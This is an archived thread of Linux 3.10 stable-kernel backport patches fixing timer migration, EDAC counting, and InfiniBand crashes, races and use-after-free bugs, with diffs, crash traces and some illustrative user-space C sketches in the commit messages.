Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Mike Galbraith <mgalbraith@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/timer.c | 19 ++++++++++++++++---
 1 file changed, 16 insertions(+), 3 deletions(-)

diff --git a/kernel/timer.c b/kernel/timer.c
index 20f45ea..be22e45 100644
--- a/kernel/timer.c
+++ b/kernel/timer.c
@@ -923,13 +923,26 @@ EXPORT_SYMBOL(add_timer);
  */
 void add_timer_on(struct timer_list *timer, int cpu)
 {
-	struct tvec_base *base = per_cpu(tvec_bases, cpu);
+	struct tvec_base *new_base = per_cpu(tvec_bases, cpu);
+	struct tvec_base *base;
 	unsigned long flags;
 
 	timer_stats_timer_set_start_info(timer);
 	BUG_ON(timer_pending(timer) || !timer->function);
-	spin_lock_irqsave(&base->lock, flags);
-	timer_set_base(timer, base);
+
+	/*
+	 * If @timer was on a different CPU, it should be migrated with the
+	 * old base locked to prevent other operations proceeding with the
+	 * wrong base locked.  See lock_timer_base().
+	 */
+	base = lock_timer_base(timer, &flags);
+	if (base != new_base) {
+		timer_set_base(timer, NULL);
+		spin_unlock(&base->lock);
+		base = new_base;
+		spin_lock(&base->lock);
+		timer_set_base(timer, base);
+	}
 	debug_activate(timer, timer->expires);
 	internal_add_timer(base, timer);
 	/*
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 198/319] EDAC: Increment correct counter in edac_inc_ue_error()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (96 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 197/319] timers: Use proper base migration in add_timer_on() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt() Willy Tarreau
                   ` (120 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Emmanouil Maroudas, Mauro Carvalho Chehab, linux-edac,
	Borislav Petkov, Willy Tarreau

From: Emmanouil Maroudas <emmanouil.maroudas@gmail.com>

commit 993f88f1cc7f0879047ff353e824e5cc8f10adfc upstream.

Fix typo in edac_inc_ue_error() to increment ue_noinfo_count instead of
ce_noinfo_count.
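
For illustration only, the corrected accounting can be sketched in
user-space C. The toy_mci type and toy_inc_ue_error() below are
hypothetical stand-ins, not the EDAC API; per-layer reporting is left out.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for the counters kept in struct mem_ctl_info. */
struct toy_mci {
	unsigned int ue_mc;		/* total uncorrected errors */
	unsigned int ue_noinfo_count;	/* uncorrected, no layer info */
	unsigned int ce_noinfo_count;	/* corrected, no layer info */
};

/* Account @count uncorrected errors, mirroring the fixed early return. */
static void toy_inc_ue_error(struct toy_mci *mci, bool per_layer_report,
			     unsigned int count)
{
	assert(mci != NULL);

	mci->ue_mc += count;

	if (!per_layer_report) {
		/* The typo bumped ce_noinfo_count here instead. */
		mci->ue_noinfo_count += count;
		return;
	}
	/* Per-layer accounting is omitted from this sketch. */
}
```

With per-layer reporting disabled, only the uncorrected-error counters
move; the corrected-error counter stays untouched.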

Signed-off-by: Emmanouil Maroudas <emmanouil.maroudas@gmail.com>
Cc: Mauro Carvalho Chehab <mchehab@osg.samsung.com>
Cc: linux-edac <linux-edac@vger.kernel.org>
Fixes: 4275be635597 ("edac: Change internal representation to work with layers")
Link: http://lkml.kernel.org/r/1461425580-5898-1-git-send-email-emmanouil.maroudas@gmail.com
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/edac/edac_mc.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/edac/edac_mc.c b/drivers/edac/edac_mc.c
index a9d98cd..9e15fc8 100644
--- a/drivers/edac/edac_mc.c
+++ b/drivers/edac/edac_mc.c
@@ -968,7 +968,7 @@ static void edac_inc_ue_error(struct mem_ctl_info *mci,
 	mci->ue_mc += count;
 
 	if (!enable_per_layer_report) {
-		mci->ce_noinfo_count += count;
+		mci->ue_noinfo_count += count;
 		return;
 	}
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (97 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 198/319] EDAC: Increment correct counter in edac_inc_ue_error() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-06  5:14   ` Bart Van Assche
  2017-02-05 19:20 ` [PATCH 3.10 200/319] IB/ipoib: Fix memory corruption in ipoib cm mode connect flow Willy Tarreau
                   ` (119 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Bart Van Assche, Nicholas Bellinger, Sagi Grimberg, Doug Ledford,
	Willy Tarreau

From: Bart Van Assche <bart.vanassche@sandisk.com>

commit 51093254bf879bc9ce96590400a87897c7498463 upstream.

Let the target core check task existence instead of the SRP target
driver. Additionally, let the target core check the validity of the
task management request instead of the ib_srpt driver.

This patch fixes the following kernel crash:

BUG: unable to handle kernel NULL pointer dereference at 0000000000000001
IP: [<ffffffffa0565f37>] srpt_handle_new_iu+0x6d7/0x790 [ib_srpt]
Oops: 0002 [#1] SMP
Call Trace:
 [<ffffffffa05660ce>] srpt_process_completion+0xde/0x570 [ib_srpt]
 [<ffffffffa056669f>] srpt_compl_thread+0x13f/0x160 [ib_srpt]
 [<ffffffff8109726f>] kthread+0xcf/0xe0
 [<ffffffff81613cfc>] ret_from_fork+0x7c/0xb0

Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Fixes: 3e4f574857ee ("ib_srpt: Convert TMR path to target_submit_tmr")
Tested-by: Alex Estrin <alex.estrin@intel.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Cc: Nicholas Bellinger <nab@linux-iscsi.org>
Cc: Sagi Grimberg <sagig@mellanox.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/ulp/srpt/ib_srpt.c | 59 +----------------------------------
 1 file changed, 1 insertion(+), 58 deletions(-)

diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
index fcf9f87..1e79114 100644
--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
+++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
@@ -1754,47 +1754,6 @@ send_sense:
 	return -1;
 }
 
-/**
- * srpt_rx_mgmt_fn_tag() - Process a task management function by tag.
- * @ch: RDMA channel of the task management request.
- * @fn: Task management function to perform.
- * @req_tag: Tag of the SRP task management request.
- * @mgmt_ioctx: I/O context of the task management request.
- *
- * Returns zero if the target core will process the task management
- * request asynchronously.
- *
- * Note: It is assumed that the initiator serializes tag-based task management
- * requests.
- */
-static int srpt_rx_mgmt_fn_tag(struct srpt_send_ioctx *ioctx, u64 tag)
-{
-	struct srpt_device *sdev;
-	struct srpt_rdma_ch *ch;
-	struct srpt_send_ioctx *target;
-	int ret, i;
-
-	ret = -EINVAL;
-	ch = ioctx->ch;
-	BUG_ON(!ch);
-	BUG_ON(!ch->sport);
-	sdev = ch->sport->sdev;
-	BUG_ON(!sdev);
-	spin_lock_irq(&sdev->spinlock);
-	for (i = 0; i < ch->rq_size; ++i) {
-		target = ch->ioctx_ring[i];
-		if (target->cmd.se_lun == ioctx->cmd.se_lun &&
-		    target->tag == tag &&
-		    srpt_get_cmd_state(target) != SRPT_STATE_DONE) {
-			ret = 0;
-			/* now let the target core abort &target->cmd; */
-			break;
-		}
-	}
-	spin_unlock_irq(&sdev->spinlock);
-	return ret;
-}
-
 static int srp_tmr_to_tcm(int fn)
 {
 	switch (fn) {
@@ -1829,7 +1788,6 @@ static void srpt_handle_tsk_mgmt(struct srpt_rdma_ch *ch,
 	struct se_cmd *cmd;
 	struct se_session *sess = ch->sess;
 	uint64_t unpacked_lun;
-	uint32_t tag = 0;
 	int tcm_tmr;
 	int rc;
 
@@ -1845,25 +1803,10 @@ static void srpt_handle_tsk_mgmt(struct srpt_rdma_ch *ch,
 	srpt_set_cmd_state(send_ioctx, SRPT_STATE_MGMT);
 	send_ioctx->tag = srp_tsk->tag;
 	tcm_tmr = srp_tmr_to_tcm(srp_tsk->tsk_mgmt_func);
-	if (tcm_tmr < 0) {
-		send_ioctx->cmd.se_tmr_req->response =
-			TMR_TASK_MGMT_FUNCTION_NOT_SUPPORTED;
-		goto fail;
-	}
 	unpacked_lun = srpt_unpack_lun((uint8_t *)&srp_tsk->lun,
 				       sizeof(srp_tsk->lun));
-
-	if (srp_tsk->tsk_mgmt_func == SRP_TSK_ABORT_TASK) {
-		rc = srpt_rx_mgmt_fn_tag(send_ioctx, srp_tsk->task_tag);
-		if (rc < 0) {
-			send_ioctx->cmd.se_tmr_req->response =
-					TMR_TASK_DOES_NOT_EXIST;
-			goto fail;
-		}
-		tag = srp_tsk->task_tag;
-	}
 	rc = target_submit_tmr(&send_ioctx->cmd, sess, NULL, unpacked_lun,
-				srp_tsk, tcm_tmr, GFP_KERNEL, tag,
+				srp_tsk, tcm_tmr, GFP_KERNEL, srp_tsk->task_tag,
 				TARGET_SCF_ACK_KREF);
 	if (rc != 0) {
 		send_ioctx->cmd.se_tmr_req->response = TMR_FUNCTION_REJECTED;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 200/319] IB/ipoib: Fix memory corruption in ipoib cm mode connect flow
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (98 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 201/319] IB/core: Fix use after free in send_leave function Willy Tarreau
                   ` (118 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Erez Shitrit, Leon Romanovsky, Doug Ledford, Willy Tarreau

From: Erez Shitrit <erezsh@mellanox.com>

commit 546481c2816ea3c061ee9d5658eb48070f69212e upstream.

When a new CM connection is requested, the ipoib driver copies data
from the path pointer in the CM/tx object. The path object might be
invalid at that point, and memory corruption will happen later when
the CM driver tries to use that data.

The following scenario demonstrates it:
	neigh_add_path --> ipoib_cm_create_tx -->
	queue_work (pointer to path is in the cm/tx struct)
	#while the work is still in the queue,
	#the port goes down and causes the ipoib_flush_paths:
	ipoib_flush_paths --> path_free --> kfree(path)
	#at this point the work scheduled starts.
	ipoib_cm_tx_start --> copy from the (invalid)path pointer:
	(memcpy(&pathrec, &p->path->pathrec, sizeof pathrec);)
	 -> memory corruption.

To fix that, the driver now starts the CM/tx connection only if that
specific path exists in the general paths database.
This check is protected with the relevant locks, and uses the gid from
the neigh member in the CM/tx object, which is valid because of the ref
count that was taken by the CM/tx.
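
The general idea, validating by lookup instead of trusting a pointer
saved when the work was queued, can be sketched in user-space C. All
toy_* names are hypothetical, a flat array stands in for the path tree,
and the locking that the real check relies on is omitted.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define TOY_GID_LEN	16
#define TOY_MAX_PATHS	8

/* Hypothetical path record, keyed by a 16-byte GID. */
struct toy_path {
	unsigned char gid[TOY_GID_LEN];
	int in_use;	/* cleared when the path is flushed */
	int pathrec;	/* payload that the deferred work wants to copy */
};

static struct toy_path toy_paths[TOY_MAX_PATHS];

/* Return the live path for @gid, or NULL if it has been flushed. */
static struct toy_path *toy_path_find(const unsigned char *gid)
{
	size_t i;

	assert(gid != NULL);
	for (i = 0; i < TOY_MAX_PATHS; i++)
		if (toy_paths[i].in_use &&
		    !memcmp(toy_paths[i].gid, gid, TOY_GID_LEN))
			return &toy_paths[i];
	return NULL;
}

/*
 * Deferred-work body: look the path up by key first. Returns 0 and
 * fills @out on success, -1 if the path no longer exists.
 */
static int toy_tx_start(const unsigned char *gid, int *out)
{
	struct toy_path *path = toy_path_find(gid);

	if (!path)
		return -1;	/* flushed while the work was queued */
	*out = path->pathrec;
	return 0;
}
```

A work item that runs after its path was flushed gets -1 back and can
drop the connection attempt instead of reading freed memory.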

Fixes: 839fcaba35 ('IPoIB: Connected mode experimental support')
Signed-off-by: Erez Shitrit <erezsh@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/ulp/ipoib/ipoib.h      |  1 +
 drivers/infiniband/ulp/ipoib/ipoib_cm.c   | 16 ++++++++++++++++
 drivers/infiniband/ulp/ipoib/ipoib_main.c |  2 +-
 3 files changed, 18 insertions(+), 1 deletion(-)

diff --git a/drivers/infiniband/ulp/ipoib/ipoib.h b/drivers/infiniband/ulp/ipoib/ipoib.h
index eb71aaa..fb9a7b3 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib.h
+++ b/drivers/infiniband/ulp/ipoib/ipoib.h
@@ -460,6 +460,7 @@ void ipoib_send(struct net_device *dev, struct sk_buff *skb,
 		struct ipoib_ah *address, u32 qpn);
 void ipoib_reap_ah(struct work_struct *work);
 
+struct ipoib_path *__path_find(struct net_device *dev, void *gid);
 void ipoib_mark_paths_invalid(struct net_device *dev);
 void ipoib_flush_paths(struct net_device *dev);
 struct ipoib_dev_priv *ipoib_intf_alloc(const char *format);
diff --git a/drivers/infiniband/ulp/ipoib/ipoib_cm.c b/drivers/infiniband/ulp/ipoib/ipoib_cm.c
index 3eceb61..aa9ad2d 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_cm.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_cm.c
@@ -1290,6 +1290,8 @@ void ipoib_cm_destroy_tx(struct ipoib_cm_tx *tx)
 	}
 }
 
+#define QPN_AND_OPTIONS_OFFSET	4
+
 static void ipoib_cm_tx_start(struct work_struct *work)
 {
 	struct ipoib_dev_priv *priv = container_of(work, struct ipoib_dev_priv,
@@ -1298,6 +1300,7 @@ static void ipoib_cm_tx_start(struct work_struct *work)
 	struct ipoib_neigh *neigh;
 	struct ipoib_cm_tx *p;
 	unsigned long flags;
+	struct ipoib_path *path;
 	int ret;
 
 	struct ib_sa_path_rec pathrec;
@@ -1310,7 +1313,19 @@ static void ipoib_cm_tx_start(struct work_struct *work)
 		p = list_entry(priv->cm.start_list.next, typeof(*p), list);
 		list_del_init(&p->list);
 		neigh = p->neigh;
+
 		qpn = IPOIB_QPN(neigh->daddr);
+		/*
+		 * As long as the search is with these 2 locks,
+		 * path existence indicates its validity.
+		 */
+		path = __path_find(dev, neigh->daddr + QPN_AND_OPTIONS_OFFSET);
+		if (!path) {
+			pr_info("%s ignore not valid path %pI6\n",
+				__func__,
+				neigh->daddr + QPN_AND_OPTIONS_OFFSET);
+			goto free_neigh;
+		}
 		memcpy(&pathrec, &p->path->pathrec, sizeof pathrec);
 
 		spin_unlock_irqrestore(&priv->lock, flags);
@@ -1322,6 +1337,7 @@ static void ipoib_cm_tx_start(struct work_struct *work)
 		spin_lock_irqsave(&priv->lock, flags);
 
 		if (ret) {
+free_neigh:
 			neigh = p->neigh;
 			if (neigh) {
 				neigh->cm = NULL;
diff --git a/drivers/infiniband/ulp/ipoib/ipoib_main.c b/drivers/infiniband/ulp/ipoib/ipoib_main.c
index a481094..375f9ed 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_main.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_main.c
@@ -251,7 +251,7 @@ int ipoib_set_mode(struct net_device *dev, const char *buf)
 	return -EINVAL;
 }
 
-static struct ipoib_path *__path_find(struct net_device *dev, void *gid)
+struct ipoib_path *__path_find(struct net_device *dev, void *gid)
 {
 	struct ipoib_dev_priv *priv = netdev_priv(dev);
 	struct rb_node *n = priv->path_tree.rb_node;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 201/319] IB/core: Fix use after free in send_leave function
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (99 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 200/319] IB/ipoib: Fix memory corruption in ipoib cm mode connect flow Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 202/319] IB/ipoib: Don't allow MC joins during light MC flush Willy Tarreau
                   ` (117 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Erez Shitrit, Leon Romanovsky, Doug Ledford, Willy Tarreau

From: Erez Shitrit <erezsh@mellanox.com>

commit 68c6bcdd8bd00394c234b915ab9b97c74104130c upstream.

The function send_leave sets the member group->query_id
(group->query_id = ret) after calling the sa_query, but leave_handler
can be executed before that assignment and might delete the group
object, resulting in memory corruption.

Additionally, this patch gets rid of group->query_id variable which is
not used.
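
A rough user-space sketch of the hazard and of the fixed return path
follows. The toy_* names are hypothetical; a "released" flag stands in
for the group being freed so the sketch stays safe to run.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical group; @released models the object having been freed. */
struct toy_group {
	int released;
};

typedef void (*toy_handler)(struct toy_group *group);

/* The completion handler may drop the last reference to the group. */
static void toy_leave_handler(struct toy_group *group)
{
	group->released = 1;
}

/*
 * Hypothetical query submit: on success (@id >= 0) the handler may run
 * before this function returns. Returns @id, or a negative error.
 */
static int toy_submit(struct toy_group *group, toy_handler handler, int id)
{
	assert(group != NULL && handler != NULL);
	if (id >= 0)
		handler(group);
	return id;
}

static int toy_send_leave(struct toy_group *group, int id)
{
	int ret = toy_submit(group, toy_leave_handler, id);

	/* Do not write to @group here: it may already be gone. */
	return (ret > 0) ? 0 : ret;
}
```

Any non-negative id collapses to 0 and errors pass through unchanged,
so nothing needs to be stored in the group after submission.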

Fixes: faec2f7b96b5 ('IB/sa: Track multicast join/leave requests')
Signed-off-by: Erez Shitrit <erezsh@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/core/multicast.c | 13 ++-----------
 1 file changed, 2 insertions(+), 11 deletions(-)

diff --git a/drivers/infiniband/core/multicast.c b/drivers/infiniband/core/multicast.c
index d2360a8..180d7f4 100644
--- a/drivers/infiniband/core/multicast.c
+++ b/drivers/infiniband/core/multicast.c
@@ -106,7 +106,6 @@ struct mcast_group {
 	atomic_t		refcount;
 	enum mcast_group_state	state;
 	struct ib_sa_query	*query;
-	int			query_id;
 	u16			pkey_index;
 	u8			leave_state;
 	int			retries;
@@ -339,11 +338,7 @@ static int send_join(struct mcast_group *group, struct mcast_member *member)
 				       member->multicast.comp_mask,
 				       3000, GFP_KERNEL, join_handler, group,
 				       &group->query);
-	if (ret >= 0) {
-		group->query_id = ret;
-		ret = 0;
-	}
-	return ret;
+	return (ret > 0) ? 0 : ret;
 }
 
 static int send_leave(struct mcast_group *group, u8 leave_state)
@@ -363,11 +358,7 @@ static int send_leave(struct mcast_group *group, u8 leave_state)
 				       IB_SA_MCMEMBER_REC_JOIN_STATE,
 				       3000, GFP_KERNEL, leave_handler,
 				       group, &group->query);
-	if (ret >= 0) {
-		group->query_id = ret;
-		ret = 0;
-	}
-	return ret;
+	return (ret > 0) ? 0 : ret;
 }
 
 static void join_group(struct mcast_group *group, struct mcast_member *member,
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 202/319] IB/ipoib: Don't allow MC joins during light MC flush
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (100 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 201/319] IB/core: Fix use after free in send_leave function Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 203/319] IB/mlx4: Fix incorrect MC join state bit-masking on SR-IOV Willy Tarreau
                   ` (116 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Alex Vesker, Leon Romanovsky, Doug Ledford, Willy Tarreau

From: Alex Vesker <valex@mellanox.com>

commit 344bacca8cd811809fc33a249f2738ab757d327f upstream.

This fix solves a race between light flush and on-the-fly joins.
Light flush doesn't set the device to down and unset the
IPOIB_FLAG_OPER_UP flag, which means that if a MC join is in progress
while flushing and the QP was attached to the BC MGID, we can get a
mismatch when re-attaching a QP to the BC MGID.

The light flush would set the broadcast group to NULL causing an on
the fly join to rejoin and reattach to the BC MCG as well as adding
the BC MGID to the multicast list. The flush process would later on
remove the BC MGID and detach it from the QP. On the next flush
the BC MGID is present in the multicast list but not found when trying
to detach it because of the previous double attach and single detach.
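
The "clear the flag around the flush, then restore it" pattern can be
sketched with C11 atomics. This is only an approximation of the kernel
bit operations; the toy_* names are hypothetical and a single flag word
stands in for priv->flags.

```c
#include <assert.h>
#include <stdatomic.h>

#define TOY_FLAG_OPER_UP	(1UL << 0)

static atomic_ulong toy_flags;
static int toy_joins_seen_during_flush;

/* A join attempt is only honoured while the OPER_UP flag is set. */
static int toy_try_join(void)
{
	return (atomic_load(&toy_flags) & TOY_FLAG_OPER_UP) != 0;
}

/* Atomically clear @bit and report whether it was previously set. */
static int toy_test_and_clear(unsigned long bit)
{
	assert(bit != 0);
	return (atomic_fetch_and(&toy_flags, ~bit) & bit) != 0;
}

static void toy_light_flush(void)
{
	int oper_up = toy_test_and_clear(TOY_FLAG_OPER_UP);

	/* Stand-in for the multicast flush: joins are refused here. */
	toy_joins_seen_during_flush += toy_try_join();

	/* Restore the flag only if it was set on entry. */
	if (oper_up)
		atomic_fetch_or(&toy_flags, TOY_FLAG_OPER_UP);
}
```

Remembering the old value keeps an interface that was already down
from being marked up by the flush.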

[18332.714265] ------------[ cut here ]------------
[18332.717775] WARNING: CPU: 6 PID: 3767 at drivers/infiniband/core/verbs.c:280 ib_dealloc_pd+0xff/0x120 [ib_core]
...
[18332.775198] Hardware name: Red Hat KVM, BIOS Bochs 01/01/2011
[18332.779411]  0000000000000000 ffff8800b50dfbb0 ffffffff813fed47 0000000000000000
[18332.784960]  0000000000000000 ffff8800b50dfbf0 ffffffff8109add1 0000011832f58300
[18332.790547]  ffff880226a596c0 ffff880032482000 ffff880032482830 ffff880226a59280
[18332.796199] Call Trace:
[18332.798015]  [<ffffffff813fed47>] dump_stack+0x63/0x8c
[18332.801831]  [<ffffffff8109add1>] __warn+0xd1/0xf0
[18332.805403]  [<ffffffff8109aebd>] warn_slowpath_null+0x1d/0x20
[18332.809706]  [<ffffffffa025d90f>] ib_dealloc_pd+0xff/0x120 [ib_core]
[18332.814384]  [<ffffffffa04f3d7c>] ipoib_transport_dev_cleanup+0xfc/0x1d0 [ib_ipoib]
[18332.820031]  [<ffffffffa04ed648>] ipoib_ib_dev_cleanup+0x98/0x110 [ib_ipoib]
[18332.825220]  [<ffffffffa04e62c8>] ipoib_dev_cleanup+0x2d8/0x550 [ib_ipoib]
[18332.830290]  [<ffffffffa04e656f>] ipoib_uninit+0x2f/0x40 [ib_ipoib]
[18332.834911]  [<ffffffff81772a8a>] rollback_registered_many+0x1aa/0x2c0
[18332.839741]  [<ffffffff81772bd1>] rollback_registered+0x31/0x40
[18332.844091]  [<ffffffff81773b18>] unregister_netdevice_queue+0x48/0x80
[18332.848880]  [<ffffffffa04f489b>] ipoib_vlan_delete+0x1fb/0x290 [ib_ipoib]
[18332.853848]  [<ffffffffa04df1cd>] delete_child+0x7d/0xf0 [ib_ipoib]
[18332.858474]  [<ffffffff81520c08>] dev_attr_store+0x18/0x30
[18332.862510]  [<ffffffff8127fe4a>] sysfs_kf_write+0x3a/0x50
[18332.866349]  [<ffffffff8127f4e0>] kernfs_fop_write+0x120/0x170
[18332.870471]  [<ffffffff81207198>] __vfs_write+0x28/0xe0
[18332.874152]  [<ffffffff810e09bf>] ? percpu_down_read+0x1f/0x50
[18332.878274]  [<ffffffff81208062>] vfs_write+0xa2/0x1a0
[18332.881896]  [<ffffffff812093a6>] SyS_write+0x46/0xa0
[18332.885632]  [<ffffffff810039b7>] do_syscall_64+0x57/0xb0
[18332.889709]  [<ffffffff81883321>] entry_SYSCALL64_slow_path+0x25/0x25
[18332.894727] ---[ end trace 09ebbe31f831ef17 ]---

Fixes: ee1e2c82c245 ("IPoIB: Refresh paths instead of flushing them on SM change events")
Signed-off-by: Alex Vesker <valex@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/ulp/ipoib/ipoib_ib.c | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/drivers/infiniband/ulp/ipoib/ipoib_ib.c b/drivers/infiniband/ulp/ipoib/ipoib_ib.c
index 2cfa76f..39168d3 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_ib.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_ib.c
@@ -979,8 +979,17 @@ static void __ipoib_ib_dev_flush(struct ipoib_dev_priv *priv,
 	}
 
 	if (level == IPOIB_FLUSH_LIGHT) {
+		int oper_up;
 		ipoib_mark_paths_invalid(dev);
+		/* Set IPoIB operation as down to prevent races between:
+		 * the flush flow which leaves MCG and on the fly joins
+		 * which can happen during that time. mcast restart task
+		 * should deal with join requests we missed.
+		 */
+		oper_up = test_and_clear_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
 		ipoib_mcast_dev_flush(dev);
+		if (oper_up)
+			set_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
 	}
 
 	if (level >= IPOIB_FLUSH_NORMAL)
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 203/319] IB/mlx4: Fix incorrect MC join state bit-masking on SR-IOV
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (101 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 202/319] IB/ipoib: Don't allow MC joins during light MC flush Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 204/319] IB/mlx4: Fix create CQ error flow Willy Tarreau
                   ` (115 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Alex Vesker, Leon Romanovsky, Doug Ledford, Willy Tarreau

From: Alex Vesker <valex@mellanox.com>

commit e5ac40cd66c2f3cd11bc5edc658f012661b16347 upstream.

Because of an incorrect bit-masking done on the join state bits, when
handling a join request we failed to detect a difference between the
group join state and the request join state when joining as send only
full member (0x8). This caused the MC join request not to be sent.
This issue is relevant only when SRIOV is enabled and SM supports
send only full member.

This fix separates the scope bits and the join state bits into a nibble
each.
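
The arithmetic behind the bug can be checked in a few lines of
user-space C. The toy_* helpers are hypothetical, and toy_needs_join()
is only a simplified model of the comparison done when handling a join
request.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_SENDONLY_FULL_MEMBER	0x8	/* join-state bit 3 */

/* Old extraction: keeps only bits 0-2, so bit 3 is silently dropped. */
static uint8_t toy_join_state_old(uint8_t scope_join_state)
{
	return scope_join_state & 0x7;
}

/* Fixed extraction: the join state is the whole low nibble. */
static uint8_t toy_join_state_new(uint8_t scope_join_state)
{
	return scope_join_state & 0xf;
}

/* Clear the join state while preserving the scope nibble. */
static uint8_t toy_clear_join_state(uint8_t scope_join_state)
{
	return scope_join_state & 0xf0;
}

/* Does the request ask for join-state bits the group does not hold? */
static int toy_needs_join(uint8_t group_state, uint8_t req_state)
{
	assert((group_state & 0xf0) == 0 && (req_state & 0xf0) == 0);
	return (req_state & ~group_state) != 0;
}
```

With the old mask a request for 0x8 is extracted as 0, so it looks
identical to "nothing new requested" and no join is sent.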

Fixes: b9c5d6a64358 ('IB/mlx4: Add multicast group (MCG) paravirtualization for SR-IOV')
Signed-off-by: Alex Vesker <valex@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/hw/mlx4/mcg.c | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/drivers/infiniband/hw/mlx4/mcg.c b/drivers/infiniband/hw/mlx4/mcg.c
index 25b2cdf..27bedc3 100644
--- a/drivers/infiniband/hw/mlx4/mcg.c
+++ b/drivers/infiniband/hw/mlx4/mcg.c
@@ -483,7 +483,7 @@ static u8 get_leave_state(struct mcast_group *group)
 		if (!group->members[i])
 			leave_state |= (1 << i);
 
-	return leave_state & (group->rec.scope_join_state & 7);
+	return leave_state & (group->rec.scope_join_state & 0xf);
 }
 
 static int join_group(struct mcast_group *group, int slave, u8 join_mask)
